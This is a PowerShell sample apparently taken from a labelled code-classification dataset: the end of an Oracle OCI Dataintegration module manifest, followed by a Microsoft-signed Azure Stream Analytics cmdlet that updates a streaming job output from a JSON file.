RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.1.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Dataintegration.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIDataintegrationApplication',
'Get-OCIDataintegrationApplicationDetailedDescription',
'Get-OCIDataintegrationApplicationsList',
'Get-OCIDataintegrationCompositeState',
'Get-OCIDataintegrationConnection',
'Get-OCIDataintegrationConnectionsList',
'Get-OCIDataintegrationConnectionValidation',
'Get-OCIDataintegrationConnectionValidationsList',
'Get-OCIDataintegrationCopyObjectRequest',
'Get-OCIDataintegrationCopyObjectRequestsList',
'Get-OCIDataintegrationCountStatistic',
'Get-OCIDataintegrationDataAsset',
'Get-OCIDataintegrationDataAssetsList',
'Get-OCIDataintegrationDataEntitiesList',
'Get-OCIDataintegrationDataEntity',
'Get-OCIDataintegrationDataFlow',
'Get-OCIDataintegrationDataFlowsList',
'Get-OCIDataintegrationDataFlowValidation',
'Get-OCIDataintegrationDataFlowValidationsList',
'Get-OCIDataintegrationDependentObject',
'Get-OCIDataintegrationDependentObjectsList',
'Get-OCIDataintegrationDisApplication',
'Get-OCIDataintegrationDisApplicationDetailedDescription',
'Get-OCIDataintegrationDisApplicationsList',
'Get-OCIDataintegrationDisApplicationTaskRunLineagesList',
'Get-OCIDataintegrationExportRequest',
'Get-OCIDataintegrationExportRequestsList',
'Get-OCIDataintegrationExternalPublication',
'Get-OCIDataintegrationExternalPublicationsList',
'Get-OCIDataintegrationExternalPublicationValidation',
'Get-OCIDataintegrationExternalPublicationValidationsList',
'Get-OCIDataintegrationFolder', 'Get-OCIDataintegrationFoldersList',
'Get-OCIDataintegrationFunctionLibrariesList',
'Get-OCIDataintegrationFunctionLibrary',
'Get-OCIDataintegrationImportRequest',
'Get-OCIDataintegrationImportRequestsList',
'Get-OCIDataintegrationPatch',
'Get-OCIDataintegrationPatchChangesList',
'Get-OCIDataintegrationPatchesList',
'Get-OCIDataintegrationPipeline',
'Get-OCIDataintegrationPipelinesList',
'Get-OCIDataintegrationPipelineValidation',
'Get-OCIDataintegrationPipelineValidationsList',
'Get-OCIDataintegrationProject',
'Get-OCIDataintegrationProjectsList',
'Get-OCIDataintegrationPublishedObject',
'Get-OCIDataintegrationPublishedObjectsList',
'Get-OCIDataintegrationReference',
'Get-OCIDataintegrationReferencesList',
'Get-OCIDataintegrationRuntimeOperator',
'Get-OCIDataintegrationRuntimeOperatorsList',
'Get-OCIDataintegrationRuntimePipeline',
'Get-OCIDataintegrationRuntimePipelinesList',
'Get-OCIDataintegrationSchedule',
'Get-OCIDataintegrationSchedulesList',
'Get-OCIDataintegrationSchema', 'Get-OCIDataintegrationSchemasList',
'Get-OCIDataintegrationTask', 'Get-OCIDataintegrationTaskRun',
'Get-OCIDataintegrationTaskRunLineagesList',
'Get-OCIDataintegrationTaskRunLogsList',
'Get-OCIDataintegrationTaskRunsList',
'Get-OCIDataintegrationTaskSchedule',
'Get-OCIDataintegrationTaskSchedulesList',
'Get-OCIDataintegrationTasksList',
'Get-OCIDataintegrationTaskValidation',
'Get-OCIDataintegrationTaskValidationsList',
'Get-OCIDataintegrationTemplate',
'Get-OCIDataintegrationTemplatesList',
'Get-OCIDataintegrationUserDefinedFunction',
'Get-OCIDataintegrationUserDefinedFunctionsList',
'Get-OCIDataintegrationUserDefinedFunctionValidation',
'Get-OCIDataintegrationUserDefinedFunctionValidationsList',
'Get-OCIDataintegrationWorkRequest',
'Get-OCIDataintegrationWorkRequestErrorsList',
'Get-OCIDataintegrationWorkRequestLogsList',
'Get-OCIDataintegrationWorkRequestsList',
'Get-OCIDataintegrationWorkspace',
'Get-OCIDataintegrationWorkspacesList',
'Move-OCIDataintegrationCompartment',
'Move-OCIDataintegrationDisApplicationCompartment',
'New-OCIDataintegrationApplication',
'New-OCIDataintegrationApplicationDetailedDescription',
'New-OCIDataintegrationConnection',
'New-OCIDataintegrationConnectionValidation',
'New-OCIDataintegrationCopyObjectRequest',
'New-OCIDataintegrationDataAsset', 'New-OCIDataintegrationDataFlow',
'New-OCIDataintegrationDataFlowValidation',
'New-OCIDataintegrationDisApplication',
'New-OCIDataintegrationDisApplicationDetailedDescription',
'New-OCIDataintegrationEntityShape',
'New-OCIDataintegrationExportRequest',
'New-OCIDataintegrationExternalPublication',
'New-OCIDataintegrationExternalPublicationValidation',
'New-OCIDataintegrationFolder',
'New-OCIDataintegrationFunctionLibrary',
'New-OCIDataintegrationImportRequest',
'New-OCIDataintegrationPatch', 'New-OCIDataintegrationPipeline',
'New-OCIDataintegrationPipelineValidation',
'New-OCIDataintegrationProject', 'New-OCIDataintegrationSchedule',
'New-OCIDataintegrationTask', 'New-OCIDataintegrationTaskRun',
'New-OCIDataintegrationTaskSchedule',
'New-OCIDataintegrationTaskValidation',
'New-OCIDataintegrationUserDefinedFunction',
'New-OCIDataintegrationUserDefinedFunctionValidation',
'New-OCIDataintegrationWorkspace',
'Remove-OCIDataintegrationApplication',
'Remove-OCIDataintegrationApplicationDetailedDescription',
'Remove-OCIDataintegrationConnection',
'Remove-OCIDataintegrationConnectionValidation',
'Remove-OCIDataintegrationCopyObjectRequest',
'Remove-OCIDataintegrationDataAsset',
'Remove-OCIDataintegrationDataFlow',
'Remove-OCIDataintegrationDataFlowValidation',
'Remove-OCIDataintegrationDisApplication',
'Remove-OCIDataintegrationDisApplicationDetailedDescription',
'Remove-OCIDataintegrationExportRequest',
'Remove-OCIDataintegrationExternalPublication',
'Remove-OCIDataintegrationExternalPublicationValidation',
'Remove-OCIDataintegrationFolder',
'Remove-OCIDataintegrationFunctionLibrary',
'Remove-OCIDataintegrationImportRequest',
'Remove-OCIDataintegrationPatch',
'Remove-OCIDataintegrationPipeline',
'Remove-OCIDataintegrationPipelineValidation',
'Remove-OCIDataintegrationProject',
'Remove-OCIDataintegrationSchedule',
'Remove-OCIDataintegrationTask', 'Remove-OCIDataintegrationTaskRun',
'Remove-OCIDataintegrationTaskSchedule',
'Remove-OCIDataintegrationTaskValidation',
'Remove-OCIDataintegrationUserDefinedFunction',
'Remove-OCIDataintegrationUserDefinedFunctionValidation',
'Remove-OCIDataintegrationWorkspace',
'Start-OCIDataintegrationWorkspace',
'Stop-OCIDataintegrationWorkspace',
'Update-OCIDataintegrationApplication',
'Update-OCIDataintegrationApplicationDetailedDescription',
'Update-OCIDataintegrationConnection',
'Update-OCIDataintegrationCopyObjectRequest',
'Update-OCIDataintegrationDataAsset',
'Update-OCIDataintegrationDataFlow',
'Update-OCIDataintegrationDisApplication',
'Update-OCIDataintegrationDisApplicationDetailedDescription',
'Update-OCIDataintegrationExportRequest',
'Update-OCIDataintegrationExternalPublication',
'Update-OCIDataintegrationFolder',
'Update-OCIDataintegrationFunctionLibrary',
'Update-OCIDataintegrationImportRequest',
'Update-OCIDataintegrationPipeline',
'Update-OCIDataintegrationProject',
'Update-OCIDataintegrationReference',
'Update-OCIDataintegrationSchedule',
'Update-OCIDataintegrationTask', 'Update-OCIDataintegrationTaskRun',
'Update-OCIDataintegrationTaskSchedule',
'Update-OCIDataintegrationUserDefinedFunction',
'Update-OCIDataintegrationWorkspace'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Dataintegration'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_26_78.ps1
|
sample_26_78.ps1
|
# ----------------------------------------------------------------------------------
#
# Copyright Microsoft Corporation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------------
<#
.Synopsis
Updates an existing output under an existing streaming job.
This can be used to partially update (ie.
update one or two properties) an output without affecting the rest the job or output definition.
.Description
Updates an existing output under an existing streaming job.
This can be used to partially update (ie.
update one or two properties) an output without affecting the rest the job or output definition.
.Example
PS C:\> {{ Add code here }}
{{ Add output here }}
.Example
PS C:\> {{ Add code here }}
{{ Add output here }}
.Inputs
Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.IOutput
.Inputs
Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.IStreamAnalyticsIdentity
.Outputs
Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.IOutput
.Notes
COMPLEX PARAMETER PROPERTIES
To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables.
DATASOURCE <IOutputDataSource>: Describes the data source that output will be written to. Required on PUT (CreateOrReplace) requests.
Type <String>: Indicates the type of data source output will be written to. Required on PUT (CreateOrReplace) requests.
INPUTOBJECT <IStreamAnalyticsIdentity>: Identity Parameter
[ClusterName <String>]: The name of the cluster.
[FunctionName <String>]: The name of the function.
[Id <String>]: Resource identity path
[InputName <String>]: The name of the input.
[JobName <String>]: The name of the streaming job.
[Location <String>]: The region in which to retrieve the subscription's quota information. You can find out which regions Azure Stream Analytics is supported in here: https://azure.microsoft.com/en-us/regions/
[OutputName <String>]: The name of the output.
[ResourceGroupName <String>]: The name of the resource group. The name is case insensitive.
[SubscriptionId <String>]: The ID of the target subscription.
[TransformationName <String>]: The name of the transformation.
OUTPUT <IOutput>: An output object, containing all information associated with the named output. All outputs are contained under a streaming job.
[Datasource <IOutputDataSource>]: Describes the data source that output will be written to. Required on PUT (CreateOrReplace) requests.
Type <String>: Indicates the type of data source output will be written to. Required on PUT (CreateOrReplace) requests.
[ETag <String>]:
[SerializationType <EventSerializationType?>]: Indicates the type of serialization that the input or output uses. Required on PUT (CreateOrReplace) requests.
[SizeWindow <Single?>]:
[TimeWindow <String>]:
.Link
https://learn.microsoft.com/powershell/module/az.streamanalytics/update-azstreamanalyticsoutput
#>
function Update-AzStreamAnalyticsOutput {
[OutputType([Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.IOutput])]
[CmdletBinding(DefaultParameterSetName='Update', PositionalBinding=$false, SupportsShouldProcess, ConfirmImpact='Medium')]
param(
[Parameter(ParameterSetName='Update', Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')]
[System.String]
# The name of the streaming job.
${JobName},
[Parameter(ParameterSetName='Update', Mandatory)]
[Alias('OutputName')]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')]
[System.String]
# The name of the output.
${Name},
[Parameter(ParameterSetName='Update', Mandatory)]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')]
[System.String]
# The name of the resource group.
# The name is case insensitive.
${ResourceGroupName},
[Parameter(ParameterSetName='Update', Mandatory)]
[Parameter(ParameterSetName='UpdateViaIdentity', Mandatory, ValueFromPipeline)]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')]
[System.String]
# The name of the streaming job.
${File},
[Parameter(ParameterSetName='Update')]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')]
[System.String]
# The ID of the target subscription.
${SubscriptionId},
[Parameter(ParameterSetName='UpdateViaIdentity', Mandatory, ValueFromPipeline)]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.IStreamAnalyticsIdentity]
# Identity Parameter
# To construct, see NOTES section for INPUTOBJECT properties and create a hash table.
${InputObject},
[Parameter()]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Header')]
[System.String]
# The ETag of the output.
# Omit this value to always overwrite the current output.
# Specify the last-seen ETag value to prevent accidentally overwriting concurrent changes.
${IfMatch},
[Parameter()]
[Alias('AzureRMContext', 'AzureCredential')]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Azure')]
[System.Management.Automation.PSObject]
# The credentials, account, tenant, and subscription used for communication with Azure.
${DefaultProfile},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Wait for .NET debugger to attach
${Break},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be appended to the front of the pipeline
${HttpPipelineAppend},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be prepended to the front of the pipeline
${HttpPipelinePrepend},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')]
[System.Uri]
# The URI for the proxy server to use
${Proxy},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')]
[System.Management.Automation.PSCredential]
# Credentials for a proxy server to use for the remote call
${ProxyCredential},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Use the default credentials for the proxy
${ProxyUseDefaultCredentials}
)
begin {
try {
$outputParameters = Get-Content -Path $File | Out-String
if ([Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.OutputTypeConverter]::CanConvertFrom($outputParameters))
{
$function = [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.OutputTypeConverter]::ConvertFrom($outputParameters)
} else {
throw "The json format is invalid"
}
$PSBoundParameters.Add("Output", $function)
$null = $PSBoundParameters.Remove("File");
$outBuffer = $null
if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) {
$PSBoundParameters['OutBuffer'] = 1
}
$parameterSet = $PSCmdlet.ParameterSetName
$mapping = @{
Update = 'Az.StreamAnalytics.private\Update-AzStreamAnalyticsOutput_Update';
UpdateExpanded = 'Az.StreamAnalytics.private\Update-AzStreamAnalyticsOutput_UpdateExpanded';
UpdateViaIdentity = 'Az.StreamAnalytics.private\Update-AzStreamAnalyticsOutput_UpdateViaIdentity';
UpdateViaIdentityExpanded = 'Az.StreamAnalytics.private\Update-AzStreamAnalyticsOutput_UpdateViaIdentityExpanded';
}
if (('Update', 'UpdateExpanded') -contains $parameterSet -and -not $PSBoundParameters.ContainsKey('SubscriptionId')) {
$PSBoundParameters['SubscriptionId'] = (Get-AzContext).Subscription.Id
}
$wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet)
$scriptCmd = {& $wrappedCmd @PSBoundParameters}
$steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin)
$steppablePipeline.Begin($PSCmdlet)
} catch {
throw
}
}
process {
try {
$steppablePipeline.Process($_)
} catch {
throw
}
}
end {
try {
$steppablePipeline.End()
} catch {
throw
}
}
}
# SIG # Begin signature block
# MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBLOTC8Nz12Ju6M
# lwVYuyTOBOeo1qA6HUaSgbR7OlRtxqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA
# DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA
# hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG
# 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN
# xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL
# go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB
# tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd
# mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ
# 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY
# 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp
# XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn
# TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT
# e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG
# OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O
# PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk
# ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx
# HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt
# CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIFLJsR7R3AmOR9mE4TE60F2M
# Kntcku6p5IWfZx9msgCVMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAq4eGql0af5iHS2BY4AZwED8PA+ziJrPIU4+6qC3+ALqTP55HBewHl3Qz
# e9RRpeYdYqHqNlVE1dgVdB7AiUKdauJQyaBGRLHcV5EwZI0KJH2BoGixwbAQJByL
# ngaSAJIaegVG1MHS285ZGp29/yk6mOdHBNNg2oJ7mgTbSqM3Eq7+pozFcnoTheVo
# h+4skvZOJDqfUUrVznJHSGXJYjZi503SAYiFIaMMm2hXiUUFnaiTzfKQtpbaeTIW
# SDo29Y9oN5rC5Bd+sRcP4dv/gelo1IDT0icGYVreY1DbvPNdVmn3/Nk5+J1KY5Se
# sFFr0kjAGMS06U9SHEIb8N/4PWw/w6GCFykwghclBgorBgEEAYI3AwMBMYIXFTCC
# FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq
# hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCCXePcWitIRLw1BTDak54TZlzBqfjnfv0lsGMNSRN2adwIGZh/SmF65
# GBMyMDI0MDQyMzEzMTUyMS4xMDlaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
# OjNCRDQtNEI4MC02OUMzMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT
